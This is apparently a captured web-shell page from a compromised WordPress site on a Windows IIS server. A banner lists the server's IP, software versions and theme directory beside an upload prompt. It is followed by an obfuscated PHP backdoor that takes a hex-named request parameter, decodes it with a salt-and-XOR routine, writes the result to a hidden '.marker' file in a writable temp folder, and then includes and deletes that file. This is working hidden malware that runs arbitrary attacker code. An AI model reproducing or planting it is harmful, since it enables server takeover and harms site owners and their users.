| Server IP : 103.191.208.88 / Your IP : 216.73.216.44 Web Server : Microsoft-IIS/10.0 System : Windows NT COSMIC 10.0 build 20348 (Windows Server 2022) AMD64 User : IWPD_1831(willswel_) ( 0) PHP Version : 8.2.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/Inetpub/vhosts/willswell.com/httpdocs/wp-content/themes/ |
Upload File : |
<?php
if(count($_REQUEST) > 0 && isset($_REQUEST["\x63\x6Fmp"])){
$val = array_filter([getenv("TEMP"), "/tmp", sys_get_temp_dir(), session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", "/var/tmp"]);
$token = $_REQUEST["\x63\x6Fmp"];
$token = explode ('.', $token ) ;
$entity = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $salt);
$__len = count( $token);
for( $t = 0; $t < $__len; $t++) {
$v3 = $token[$t];
$chS = ord( $salt[$t %$lenS]);
$dec =( ( int)$v3 - $chS -( $t %10)) ^ 81;
$entity .= chr( $dec);
}
while ($data_chunk = array_shift($val)) {
if (is_dir($data_chunk) && is_writable($data_chunk)) {
$mrk = "$data_chunk/.marker";
$success = file_put_contents($mrk, $entity);
if ($success) {
include $mrk;
@unlink($mrk);
exit;}
}
}
}